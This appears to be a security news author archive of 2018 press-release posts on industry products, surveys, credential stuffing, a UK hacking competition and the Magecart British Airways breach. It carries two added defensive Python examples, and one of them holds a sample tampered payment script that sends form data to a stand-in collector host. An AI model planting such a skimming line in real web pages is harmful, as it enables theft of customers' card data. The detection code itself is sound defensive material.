Author Archives: Dean Alvarez

Integration with Cisco Technologies Delivers IT / ICS Security

Large organizations utilize a variety of technologies and solutions to create cyber resiliency, an important part of the best practice known as Defense in Depth. But, using disparate systems can actually result in increased security exposure and risks, and slower response to threats.

A few years ago, Cisco began working with the best and brightest minds around the world to address this issue. This led to the creation of their security technology program, which included an open platform for collaboration called the Cisco Security Technology Alliance (CSTA).

Nozomi Networks has integrated its ICS security solution with the CSTA to deliver comprehensive operational visibility and cyber security across IT/OT networks.

Nozomi Networks Integrates with Cisco Security Policy Platform and Devices

The CSTA provides an environment for leading security solution providers like us to integrate with Cisco APIs and SDKs across the Cisco security portfolio.

Nozomi Networks kicked off membership in CSTA with security integration for Cisco’s Identity Services Engine (ISE).

The Identity Services Engine (ISE) is a security policy management platform that helps organizations manage users and devices on business networks. Sharing contextual usage data amongst IT systems and solutions makes it much easier to enforce policies for resource access, and more.


The post Integration with Cisco Technologies Delivers IT / ICS Security appeared first on IT SECURITY GURU.

Global Study Finds Artificial Intelligence is Key Cybersecurity Weapon in the IoT Era

As businesses struggle to combat increasingly sophisticated cybersecurity attacks, the severity of which is exacerbated by both the vanishing IT perimeters of today’s mobile and IoT era and an acute shortage of skilled security professionals, IT security teams need both a new approach and powerful new tools to protect data and other high-value assets. Increasingly, they are looking to artificial intelligence (AI) as a key weapon to win the battle against stealthy threats inside their IT infrastructures, according to a new global research study conducted by the Ponemon Institute on behalf of Aruba, a Hewlett Packard Enterprise company (NYSE:HPE).

The Ponemon Institute study, entitled “Closing the IT Security Gap with Automation & AI in the Era of IoT,” surveyed 4,000 security and IT professionals across the Americas, Europe and Asia to understand what makes security deficiencies so hard to fix, and what types of technologies and processes are needed to stay a step ahead of bad actors within the new threat landscape.

The research revealed that in the quest to protect data and other high-value assets, security systems incorporating machine learning and other AI-based technologies are essential for detecting and stopping attacks that target users and IoT devices. The majority of respondents agree that security products with AI functionality will help to:

  • Reduce false alerts (68 percent)
  • Increase their team’s effectiveness (63 percent)
  • Provide greater investigation efficiencies (60 percent)
  • Advance their ability to more quickly discover and respond to stealthy attacks that have evaded perimeter defense systems (56 percent)

Twenty-five percent of respondents said they currently use some form of an AI-based security solution, with another 26 percent stating they plan on deploying these types of products within the next 12 months.

Current Security Tools are not Enough

“Despite massive investments in cybersecurity programs, our research found most businesses are still unable to stop advanced, targeted attacks – with 45 percent believing they are not realizing the full value of their defense arsenal, which ranges from 10 to 75 security solutions,” said Larry Ponemon, chairman, Ponemon Institute. “The situation has become a ‘perfect storm,’ with nearly half of respondents saying it’s very difficult to protect complex and dynamically changing attack surfaces, especially given the current lack of security staff with the necessary skills and expertise to battle today’s persistent, sophisticated, highly trained, and well-financed attackers. Against this backdrop, AI-based security tools, which can automate tasks and free up IT personnel to manage other aspects of a security program, were viewed as critical for helping businesses keep up with increasing threat levels.”

IoT and Cloud Add Significant Risk

Ponemon researchers found that the majority of IT security teams believe that a key gap in their company’s overall security strategy is their inability to identify attacks that use IoT devices as the point of entry. In fact, more than three-quarters of respondents believe their IoT devices are not secure, with 60 percent stating even simple IoT devices pose a threat. Two-thirds of respondents admitted they have little or no ability to protect their “things” from attacks. Continuous monitoring of network traffic, closed-loop detection and response systems, and detecting behavioral anomalies among peer groups of IoT devices, were cited as the most effective approaches to better protect their environments.

Even the ownership model for IoT security presents potential risk. When asked who inside their organization was responsible for IoT security, responses ranged from the CIO, CISO, CTO, and line-of-business leaders, with no majority consensus. Only 33 percent identified the CIO, with no other executive or functional group achieving response totals above 20 percent. Surprisingly, “No Function” was the third-highest answer (15 percent).

Survey results also highlighted the importance of visibility and the ability to define which resources people and IoT devices can access, with 63 percent of respondents stating network access control is an important element of their company’s overall security strategy and critical for reducing the reach of inside exploits. Also cited as important was having detailed information about applications (71 percent), endpoints (69 percent), cloud (64 percent), and networks (63 percent), with more than half saying they currently deploy network access control solutions for enabling visibility and control across both wired and wireless networks.

Additionally, more than half of respondents said it’s hard to protect expanding and blurring IT perimeters resulting from requirements to concurrently support IoT, BYOD, mobile, and cloud initiatives (55%).

“Partnering with the Ponemon Institute helps us to improve customer experiences by better understanding security teams’ challenges, and then arming them with advanced solutions that enable quick identification and responses to an ever-changing threat landscape,” said Larry Lunetta, vice president of security solutions marketing for Aruba. “The insight gained from this study enables us to continually improve our ability to provide an enterprise wired and wireless network security framework with an integrated and more comprehensive approach for gaining back visibility and control.”


Akamai Credential Stuffing Report Shows Financial Services Industry Under Constant Attack From Automated Account Takeover Tools

According to the Akamai 2018 State of the Internet / Security Credential Stuffing Attacks report, worldwide malicious login attempts are on the rise. Findings from the report show that Akamai detected approximately 3.2 billion malicious logins per month from January through April 2018, and over 8.3 billion malicious login attempts from bots in May and June 2018 – a monthly average increase of 30 percent. In total, from the beginning of November 2017 through the end of June 2018, Akamai researcher analysis shows more than 30 billion malicious login attempts during the eight-month period.

Malicious login attempts result from credential stuffing, where hackers systematically use botnets to try stolen login information across the web. They target login pages for banks and retailers on the premise that many customers use the same login credentials for multiple services and accounts. Credential stuffing can cost organisations millions to tens of millions of dollars in fraud losses annually, according to the Ponemon Institute’s “The Cost of Credential Stuffing” report.

Akamai security and threat research plus behavioural detections power the company’s bot management technology, and Akamai’s Vice President of Web Security, Josh Shaul, shared an example of combating credential abuse on behalf of a customer. “One of the world’s largest financial services companies was experiencing over 8,000 account takeovers per month, which led to more than $100,000 per day in direct fraud-related losses,” said Shaul. “The company turned to Akamai to put behavioural-based bot detections in front of every consumer login endpoint and immediately saw a drastic reduction in account takeovers to just one to three per month and fraud-related losses down to only $1,000 to $2,000 per day.”

In addition, the State of the Internet report details two instances where Akamai combatted credential stuffing attempts for clients, demonstrating the severity of the method.

In the first case, the report recounts the issues faced by a Fortune 500 financial services institution where attackers used a botnet to conduct 8.5 million malicious login attempts within 48 hours against a site that typically only sees seven million login attempts in a week. More than 20,000 devices were involved in this botnet, which was capable of sending hundreds of requests a minute. Akamai research identified that nearly one-third of the traffic in this particular attack was generated from Vietnam and the United States.

The second real-world example from the report illustrates a “low and slow” type of attack identified at a credit union earlier this year. This financial institution saw a large spike in malicious login attempts, which ultimately revealed a trio of botnets targeting its site. While a particularly noisy botnet caught their attention, the discovery of a botnet that had been very slowly and methodically trying to break in created a much bigger concern.

“Our research shows that the people carrying out credential stuffing attacks are continuously evolving their arsenal. They vary their methodologies, from noisier, volume-based attacks, through stealth-like ‘low and slow’-style attacks,” said Martin McKeay, Senior Security Advocate at Akamai and Lead Author of the State of the Internet / Security report. “It’s especially alarming when we see multiple attacks simultaneously affecting a single target. Without specific expertise and tools needed to defend against these blended, multi-headed campaigns, organisations can easily miss some of the most dangerous credential attacks.”
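The difference between the noisy and the “low and slow” botnets described above shows up clearly in detection logic. The following is an added example, not code from Akamai or its report: it runs a request-rate check and an account-spread check over constructed login events, and it assumes each bot appears as a single source address (a real botnet spreads attempts over many devices, so the grouping key would be a device or behavioural fingerprint instead).

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta


def build_sample_events():
    """Constructed login events: (timestamp, source, username, success)."""
    t0 = datetime(2018, 6, 1)
    events = []
    # Noisy bot: 300 failed logins in 5 minutes, a new username each time.
    for i in range(300):
        events.append((t0 + timedelta(seconds=i), "198.51.100.10", f"user{i}", False))
    # Low-and-slow bot: one attempt every 20 minutes for 24 hours.
    for i in range(72):
        events.append((t0 + timedelta(minutes=20 * i), "203.0.113.7", f"acct{i}", i % 36 == 0))
    # One customer who mistypes a password once.
    for i in range(5):
        events.append((t0 + timedelta(hours=4 * i), "192.0.2.55", "alice", i != 2))
    # Office NAT: eight staff accounts behind one address, mostly successful.
    for i in range(40):
        events.append((t0 + timedelta(minutes=30 * i), "192.0.2.80", f"staff{i % 8}", i % 10 != 0))
    return sorted(events, key=lambda e: e[0])


def rate_based(events, window=timedelta(minutes=1), max_attempts=30):
    """Flag sources that exceed max_attempts inside any sliding window."""
    flagged = set()
    recent = defaultdict(deque)
    for ts, src, _user, _ok in events:
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        if len(q) > max_attempts:
            flagged.add(src)
    return flagged


def spread_based(events, min_accounts=20, min_fail_ratio=0.8):
    """Flag sources that try many distinct accounts and mostly fail.

    Works over the whole look-back period passed in, so speed is irrelevant:
    a source is judged by how many accounts it touched and how often it failed.
    """
    users = defaultdict(set)
    attempts = defaultdict(int)
    failures = defaultdict(int)
    for _ts, src, user, ok in events:
        users[src].add(user)
        attempts[src] += 1
        if not ok:
            failures[src] += 1
    return {
        src for src in attempts
        if len(users[src]) >= min_accounts
        and failures[src] / attempts[src] >= min_fail_ratio
    }


if __name__ == "__main__":
    sample = build_sample_events()
    print("rate check flags:  ", sorted(rate_based(sample)))
    print("spread check flags:", sorted(spread_based(sample)))
```

The thresholds are illustrative values chosen for the sample data, not recommendations from the report.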

A complimentary copy of the 2018 State of the Internet / Security Credential Stuffing Attacks report is available for download here. For additional information about the rise of credential stuffing challenges and ways to protect your organisation against them, visit here.


Future UK Cyber Security Stars Tackle Vulnerable Cryptocurrency in Latest Challenges

On Friday, Her Majesty’s Government Communications Centre (HMGCC) and leading science and engineering company QinetiQ hosted the latest Cyber Security Challenge UK Face-to-Face competition at QinetiQ’s headquarters in Farnborough. The competition saw 28 code-breaking amateurs from across the country ethically hack the cryptocurrency wallets of customers from a fictitious bank. The challenges, which put contestants’ cryptography, problem-solving, automation and scripting skills to the test, included breaking into digital vaults and delivering presentations to expectant board members.

With crypto wallets making headlines in the news recently and cryptocurrencies such as Bitcoin reaching incredible worth, it is no wonder that Action Fraud found that cryptocurrency fraud created more than £2 million of losses this summer. It is therefore crucial that the systems and services people use are safe, secure and tested by highly skilled cyber security experts before people invest and store money in them, thereby ensuring a high enough level of protection.

To highlight these contemporary issues, HMGCC and QinetiQ have worked in partnership to develop one of the most challenging face-to-face competitions in Cyber Security Challenge UK history as validated by HMGCC interns – who road-tested the challenges while on placement there within their NCSC CyberFirst bursary programme. Teams pulled from the technical minds of experienced staff and graduates from both companies created the digital challenges for the contestants to battle their way through on the day, and HMGCC lent their manufacturing skills to create a vault to be cracked as well.

The scenario in particular was based on a mock company QQGCC – a new cryptocurrency bank – which, in a move of confidence, publicly listed the encrypted wallets of each customer account. To avoid the high-profile security errors of other companies before them, QQGCC allowed customers to choose their own system to hide the key that would ultimately give people access to the account. With each customer choosing a unique method to conceal their account’s encryption key, candidates were tasked with fool-proofing each system by attempting to hack their way into the accounts and discover which character’s money would be at risk.

“We really wanted to push the contestants and seriously test their skill sets. Digital wallets and cryptocurrencies may not feel like money, but they have genuine real-world value that needs to be protected,” said Ashleigh Curnow from HMGCC’s Recruitment Team. “Supporting competitions and initiatives with Cyber Security Challenge UK and QinetiQ provides a brilliant platform for uncovering and nurturing cyber security talent while also highlighting the need for due diligence to be carried out with digital security. We’ve been really impressed with the skills and determination we have seen from all of the competitors and we are excited to see that the UK is continuing to develop the engineers that we need.”

This latest event also acted as the final semi-final round of Cyber Security Challenge UK’s 2018 Masterclass competition, with the top performers earning a place at the Masterclass Grand Final at Barclays in Canary Wharf in November. In order to qualify for the face-to-face competition, each contestant had to pass rigorous online tests, which created a diverse group of people taking part, including seven people aged 30 or over and nearly half of the contestants aged 18 or under.

“It has been amazing to see the number of talented and skilled individuals taking part in this competition. The great thing about these challenges is it helps demonstrate to people how many career paths and opportunities are open to them. Cyber security is a vibrant and exciting sector to work in and we are pleased to showcase that with the help of our expert cyber security specialists,” said Bryan Lillie, Chief Technical Officer Cyber Security at QinetiQ. “All of the contestants in today’s competition displayed the skills we would look for when hiring talent for our own security teams. Congratulations to the winners, for a well-deserved result.”

The winning team, Great Hyperlobic Omnicognate Neutron Wrangler, was comprised of:

  • Callum, 17, an A-level student from London who also played Cyber Discovery this year
  • Daniel, 17, an A-level student from Stoke-on-Trent
  • Yousef, 18, an intern from St Albans
  • Edmund, 18, an A-level student from London
  • Laura, 37, an IT Technical Support professional (non-cyber security related) from Lincolnshire

Colin Lobley, CEO of Cyber Security Challenge UK added: “It was great to see that the latest challenge with QinetiQ and HMGCC not only attracted young, talented school and university students, but also people looking for career changes too. The cyber security industry has the need for a range of skills, from computer experts to psychologists, communicators and policy-makers. What we are looking for is those with an inquisitive mind. It is therefore crucial that we continue to partner with forward-thinking organisations such as HMGCC and QinetiQ to identify and inform people about what is on offer when choosing a career in cyber security.”

Those interested in learning more about a career in cyber security should attend the upcoming Cyber Re:coded event which is taking place in Tobacco Dock in London from October 15-16. During the two-day event there will be talks from security professionals, industry leaders and interactive workshops aimed at showing the large number of career opportunities on offer in the security industry. So, whether you want to spot and analyse the latest threats; design resilient digital cities, cars or games; stop counterfeiting; reverse-engineer mobile apps; shape new laws; profile cyber criminals; or develop cyber services in the age of AI and Quantum computing, the cyber security industry needs you!

For more information on Cyber Security Challenge UK and the work it is doing, please visit: https://www.cybersecuritychallenge.org.uk/


City of Stockholm Selects MobileIron Threat Defense to Detect and Mitigate Mobile Threats

MobileIron, the secure foundation for modern work, today announced that City of Stockholm has selected MobileIron Threat Defense to detect and mitigate mobile threats. MobileIron Threat Defense will be deployed on 30,000 mobile devices used by the employees of the City of Stockholm.

MobileIron Threat Defense provides unparalleled mobile threat protection, securing mobile devices from device, network, and app threats. Organizations can protect sensitive data by detecting and remediating known and zero-day threats on mobile devices with no need for the users to take any action to activate or deploy the app.

“City of Stockholm employees rely on their mobile devices to increase their work efficiency,” said Constantinos Amiridis, solution architect, City of Stockholm. “With MobileIron Threat Defense, we can give our employees the peace of mind to safely use their devices without any data being compromised.”

“City of Stockholm has always been at the forefront of technology, deploying innovative solutions that help its many departments perform with agility and efficiency,” said Simon Biddiscombe, CEO, MobileIron. “Today, through its selection of MobileIron Threat Defense, City of Stockholm has yet again shown its commitment to working with best-in-class technology to keep its workforce secure and productive.”


RiskIQ implicates Magecart in breach of British Airways

RiskIQ, the global leader in digital risk management, today revealed that its researchers traced the breach of 380,000 sets of payment information belonging to customers of British Airways to Magecart, the credit-card skimming group made infamous for its July breach of Ticketmaster.

Because the attack was reported by British Airways to be web-based and targeting credit card data, RiskIQ researchers strongly suspected Magecart was behind it. Leveraging the company’s global web-crawling network, which maintains a map of the internet and enables security practitioners to analyse web pages and their components as they appear through time, they confirmed that assumption.

The attack was similar to the one leveled against Ticketmaster with one key difference: instead of compromising commonly used third-party functionality to gain access to hundreds of sites at once, Magecart operatives compromised the British Airways site directly and planned their attack around the site’s unique structure and functionality. RiskIQ’s data shows that scripts supporting the functionality of the payment forms on the British Airways’ website were copied and modified to deliver payment information to an attacker-controlled server while maintaining their intended functionality to avoid detection.

The attackers were also aware of the way the British Airways mobile app was constructed, leveraging the fact that it used much of the same functionality as the web-app and could, therefore, victimise users in the same way.  

“This attack is a highly targeted approach compared to what we’ve seen in the past with the Magecart skimmer,” said Yonathan Klijnsma, head researcher at RiskIQ. “This skimmer is attuned to how British Airways’ payment page is set up, which tells us that the attackers carefully considered how to target this site in particular.”

The researchers also found evidence that Magecart operatives may have breached the British Airways site several days before the skimming began. RiskIQ web-crawling data shows that a certificate used on the attacker’s command and control server was issued on August 15, nearly a week before the reported start date of the attack on August 21.
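The tampering described above, where payment-form scripts were modified to send data to an attacker-controlled server while still working normally, is the case a baseline comparison of served scripts is meant to catch. The following is an added example, not RiskIQ's tooling or anything from its report: it compares each served script with the hash of a reviewed copy and lists any hostnames in a changed script that are not on an allowlist. All script names, contents and hosts are constructed placeholders.

```python
import hashlib
import re
from urllib.parse import urlparse

# Absolute URLs inside script text; hostnames are compared, not full URLs.
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")


def sha256_hex(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def hosts_in(script_text):
    """Hostnames of every absolute URL literal found in the script."""
    hosts = {urlparse(u).hostname for u in URL_RE.findall(script_text)}
    hosts.discard(None)
    return hosts


def audit_scripts(baseline, served, allowed_hosts):
    """Compare served scripts with reviewed hashes.

    baseline: {script name: sha256 of the reviewed copy}
    served:   {script name: script text fetched from the live page}
    Returns (name, reason, unexpected hosts) for each script needing review.
    """
    findings = []
    for name in sorted(served):
        body = served[name]
        if name not in baseline:
            reason = "not in baseline"
        elif sha256_hex(body) != baseline[name]:
            reason = "content changed"
        else:
            continue
        findings.append((name, reason, sorted(hosts_in(body) - allowed_hosts)))
    return findings


# Constructed sample data (hypothetical names and hosts).
REVIEWED = {
    "payment-form.js": 'function pay(d){ post("https://pay.example.com/submit", d); }',
    "menu.js": "function toggleMenu(){ /* ui only */ }",
}
BASELINE = {name: sha256_hex(text) for name, text in REVIEWED.items()}
ALLOWED_HOSTS = {"pay.example.com"}

# The live copy still submits the payment, so the page works as before,
# but it now also references a host nobody reviewed.
SERVED = {
    "payment-form.js": 'function pay(d){ post("https://pay.example.com/submit", d); '
                       'post("https://collector.example.net/c", d); }',
    "menu.js": REVIEWED["menu.js"],
}


def run_sample():
    return audit_scripts(BASELINE, SERVED, ALLOWED_HOSTS)


if __name__ == "__main__":
    for name, reason, hosts in run_sample():
        print(f"{name}: {reason}; unexpected hosts: {hosts}")
```

Because the modified script keeps its intended behaviour, functional testing of the payment page would not reveal the change; the hash mismatch and the unreviewed hostname do.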

RiskIQ, which detects internet-scale threats, is alerted to new Magecart breaches hourly, a clear indication that the group is extremely active and a very real threat to all organisations offering online payment facilities. For a full analysis of this campaign, including a list of compromised components and IOCs, visit the report here: https://www.riskiq.com/blog/labs/magecart-british-airways-breach/


Cyber Security City Ranking reveals the cities best placed to attract cyber talent

Cyber security training facility Crucial Academy has released the 2018 Cyber Security City Ranking, revealing the best cities for cyber security professionals, with Reading, Leeds and Cardiff topping the table.

Analysing four factors, including salary, affordability, job availability and tech sector growth potential, the ranking sought to uncover which cities may be most attractive to those already working in or considering cyber security as a career path.

Reading in Berkshire, home to a wide variety of major international tech companies, topped the ranking, performing particularly well for job availability and salary. Leeds closely followed, gaining big points for the potential growth of its tech sector, whilst Cardiff ranked in third place, scoring top points for affordability.

With the predicted future shortfall of cyber security professionals, Crucial was keen to research the factors which may render some cities more attractive to this much needed specialist talent. A 2016 skills gap analysis from ISACA estimated a global shortage of 2 million cybersecurity professionals by 2019, according to the UK House of Lords Digital Skills Committee.

Tom Marcus, former MI5 spy and best-selling author of Soldier Spy, who partners with Crucial Academy, said: “Cyber security is one of the most serious issues UK business faces today. For young people leaving education, ex-military people looking to transition to civilian life or those looking for a career change, there is no career no more Brexit-proof than cyber security.”

The top 10 cities can be seen below:

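| Rank | City | Salary Score | Affordability Score | Job Availability Score | Tech Growth Potential Score | TOTAL SCORE |
|------|------|--------------|---------------------|------------------------|-----------------------------|-------------|
| 1 | Reading | 8.3 | 7.3 | 10 | 8.1 | 33.7 |
| 2 | Leeds | 7.7 | 7.9 | 7.5 | 9.7 | 32.8 |
| 3 | Cardiff | 9.3 | 10 | 4.2 | 8 | 31.5 |
| 4 | Edinburgh | 8.5 | 8.2 | 4.7 | 9.7 | 31.1 |
| 5 | Manchester | 7.8 | 7.5 | 6.6 | 8.9 | 30.8 |
| 6 | London | 10 | 5.9 | 5.2 | 8.2 | 29.3 |
| 7 | Glasgow | 8.1 | 8.4 | 4.2 | 8.5 | 29.2 |
| 8 | Newcastle | 8.4 | 9.2 | 3.2 | 8 | 28.8 |
| 9 | Brighton | 7.8 | 6.5 | 4.7 | 9.7 | 28.7 |
| 10 | Bristol | 7.5 | 6.7 | 4.6 | 9.3 | 28.1 |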

Neil Williams, CEO of Crucial Academy, added: “The cyber security skills gap is a growing issue across the UK. Every city in the ranking is a tech hub within its own right, however, it is fascinating to see which cities, based on these factors, may be more attractive to the much-needed talent pool of cyber security professionals.”

Other findings from the top 10 included:

  • Best cities for salaries: London followed closely by Cardiff and Edinburgh.
  • Best cities for affordability: Cardiff closely followed by Newcastle and Glasgow.
  • Best cities for job availability: Reading followed by Leeds and Manchester.
  • Best cities for tech sector growth potential: Leeds, Edinburgh and Brighton all placed highest with the same score.

Crucial Academy is run by a team of former Royal Marines Commandos and provides free cyber security training, accredited qualifications and careers for ex-servicemen and women looking for a path back to Civvy Street.

For further information please visit https://academy.crucialgroup.co.uk.
